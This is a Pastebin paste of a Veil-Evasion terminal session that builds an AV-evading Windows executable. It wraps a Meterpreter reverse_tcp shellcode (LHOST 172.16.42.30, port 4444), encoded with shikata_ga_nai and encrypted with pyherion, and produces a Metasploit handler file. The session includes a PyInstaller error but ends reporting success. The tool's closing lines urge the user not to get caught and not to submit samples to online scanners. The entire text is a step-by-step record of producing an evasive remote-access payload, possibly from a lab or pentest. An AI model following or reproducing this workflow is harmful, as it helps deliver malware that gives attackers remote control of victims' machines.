Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =========================================================================
- Veil-Evasion | [Version]: 2.20
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- Payload: python/shellcode_inject/aes_encrypt loaded
- Required Options:
- Name Current Value Description
- ---- ------------- -----------
- compile_to_exe Y Compile to an executable
- expire_payload X Optional: Payloads expire after "X" days
- inject_method Virtual Virtual, Void, Heap
- use_pyherion N Use the pyherion encrypter
- Available commands:
- set set a specific option value
- info show information about the payload
- generate generate payload
- back go to the main menu
- exit exit Veil
- [>] Please enter a command: set use_pyherion Y
- [>] Please enter a command: generate
- =========================================================================
- Veil-Evasion | [Version]: 2.20
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- [?] Use msfvenom or supply custom shellcode?
- 1 - msfvenom (default)
- 2 - custom shellcode string
- 3 - file with shellcode (raw)
- [>] Please enter the number of your choice: 1
- [*] Press [enter] for windows/meterpreter/reverse_tcp
- [*] Press [tab] to list available payloads
- [>] Please enter metasploit payload:
- [>] Enter value for 'LHOST', [tab] for local IP: 172.16.42.30
- [>] Enter value for 'LPORT': 4444
- [>] Enter extra msfvenom options in -OPTION=value or syntax:
- [*] Generating shellcode...
- No platform was selected, choosing Msf::Module::Platform::Windows from the payload
- No Arch selected, selecting Arch: x86 from the payload
- Found 10 compatible encoders
- Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
- x86/shikata_ga_nai succeeded with size 326 (iteration=0)
- x86/shikata_ga_nai chosen with final size 326
- Payload size: 326 bytes
- =========================================================================
- Veil-Evasion | [Version]: 2.20
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- [*] Press [enter] for 'payload'
- [>] Please enter the base name for output files: payload3
- [?] How would you like to create your payload executable?
- 1 - Pyinstaller (default)
- 2 - Pwnstaller (obfuscated Pyinstaller loader)
- 3 - Py2Exe
- [>] Please enter the number of your choice: 1
- err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
- err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
- err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
- err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
- err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
- Error: PyInstaller for Python 2.6+ on Windows needs pywin32.
- Please install from http://sourceforge.net/projects/pywin32/
- fixme:msvcr90:__clean_type_info_names_internal (0x8c4460) stub
- fixme:msvcr90:__clean_type_info_names_internal (0x44ba30) stub
- fixme:msvcr90:__clean_type_info_names_internal (0x100554f0) stub
- fixme:msvcr90:__clean_type_info_names_internal (0x1d1b5210) stub
- fixme:msvcr90:__clean_type_info_names_internal (0x1e24c178) stub
- mv: cannot stat `dist/payload3.exe': No such file or directory
- rm: cannot remove `*.spec': No such file or directory
- rm: cannot remove `logdict*.*': No such file or directory
- =========================================================================
- Veil-Evasion | [Version]: 2.20
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- [*] Executable written to: /usr/share/veil-output/compiled/payload3.exe
- Language: python
- Payload: python/shellcode_inject/aes_encrypt
- Shellcode: windows/meterpreter/reverse_tcp
- Options: LHOST=172.16.42.30 LPORT=4444
- Required Options: compile_to_exe=Y expire_payload=X
- inject_method=Virtual use_pyherion=Y
- Payload File: /usr/share/veil-output/source/payload3.py
- Handler File: /usr/share/veil-output/handlers/payload3_handler.rc
- [!] Please run ./config/update.py !
- [*] Your payload files have been generated, don't get caught!
- [!] And don't submit samples to any online scanner! ;)
- [>] press any key to return to the main menu:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement